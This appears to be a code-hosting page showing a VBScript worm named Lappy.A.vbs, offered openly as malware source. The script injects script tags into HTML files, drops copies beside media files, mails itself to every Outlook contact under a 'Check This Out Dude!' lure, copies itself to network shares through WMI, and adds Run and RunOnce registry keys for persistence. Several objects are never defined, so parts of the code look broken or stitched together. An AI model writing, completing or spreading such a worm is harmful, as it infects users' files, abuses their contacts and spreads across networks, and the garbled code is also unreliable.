-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathLappy.A.vbs
79 lines (67 loc) · 3.16 KB
/
Lappy.A.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
If objFSO.FileExists(strFilePath) Then
Set objFile = objFSO.OpenTextFile(strFilePath, 1)
' Do operations
objFile.Close
End If
Set objMail = objOutlook.CreateItem(0)
strFilePath = "\\network\share\Lappy.A.vbs"
strEmailSubject = "Check This Out Dude!"
' Check if there are any email addresses in the Outlook contacts
If objOutlook.Session.AddressLists.Count > 0 Then
' Infect HTML files on the victim's computer
Set objFolder = objFSO.GetFolder(objFSO.GetParentFolderName(WScript.ScriptFullName))
For Each objHTMLFile In objHTMLFiles
If LCase(objFSO.GetExtensionName(objHTMLFile.Name)) = "html" Then
strNewHTMLContent = Replace(objHTMLFile.OpenAsTextStream.ReadAll, "</head>", "<script src=""" & strFilePath & """></script></head>")
Set objNewHTMLFile = objFSO.CreateTextFile(objHTMLFile.Path, True)
objNewHTMLFile.Write strNewHTMLContent
objNewHTMLFile.Close
End If
Next
' Infect MP3, PNG, JPG, and MP4 files on the victim's computer
Set objFolder = objFileSystem.Namespace(objFSO.GetParentFolderName(WScript.ScriptFullName))
Set objItems = objFolder.Items
For Each objItem In objItems
If LCase(objFSO.GetExtensionName(objItem.Name)) = "." & LCase(objFolder.GetDetailsOf(objItem, 29)) Then
objFolder.CopyHere strFilePath & "." & objFSO.GetExtensionName(objItem.Name)
End If
Next
' Send the worm to email contacts
Set objNS = objOutlook.GetNamespace("MAPI")
objNS.Logon "profilename", "password", False, True
Set objContacts = objNS.GetDefaultFolder(10).Items
For Each objContact In objContacts
If objContact.Class = 43 Then
objMail.To = objContact.Email1Address
objMail.Body = "Check this Out Dude!"
objMail.Attachments.Add strFilePath, 1, 0, "Lappy.A.vbs"
objMail.Send
End If
Next
End If
' Spread the worm on the network
Set objNetwork = CreateObject("WScript.Network")
strComputerName = objNetwork.ComputerName
Set objWMI = GetObject("winmgmts://" & strComputerName & "/root/cimv2")
Set colItems = objWMI.ExecQuery("SELECT * FROM Win32_Share WHERE Type=0")
For Each objItem In colItems
strRemoteSharePath = "\\" & objItem.Name & "\" & WScript.ScriptFullName
Set objWMI2 = GetObject("winmgmts://" & objItem.Name & "/root/cimv2")
objWMI2.Get("Win32_Process").Create("cmd.exe /c copy """ & strFilePath & """ " & strRemoteSharePath)
Next
' Create a registry key to autostart the worm
strRegistryPath = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
strRegistryKey = "Lappy.A.vbs"
strRegistryValue = chr(34) & strFilePath & chr(34)
Set objRegistry = CreateObject("WScript.Shell")
objRegistry.RegWrite strRegistryPath & "\" & strRegistryKey, strRegistryValue, "REG_SZ"
' Create a backup registry key for the worm's backup file
strBackupRegistryPath = "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
strBackupRegistryKey = "Lappy.A.vbs_backup"
If Not objFSO.FileExists(objFSO.BuildPath(objFSO.GetParentFolderName(WScript.ScriptFullName), "backup_Lappy.A.vbs")) Then
strBackupRegistryValue = chr(34) & objFSO.BuildPath(objFSO.GetParentFolderName(WScript.ScriptFullName), "backup_Lappy.A.vbs") & chr(34)
Else
strBackupRegistryValue = chr(34) & strFilePath & chr(34)
End If
objRegistry.RegWrite strBackupRegistryPath & "\" & strBackupRegistryKey, strBackupRegistryValue, "REG_SZ"
MsgBox "Hacked By Chinese!"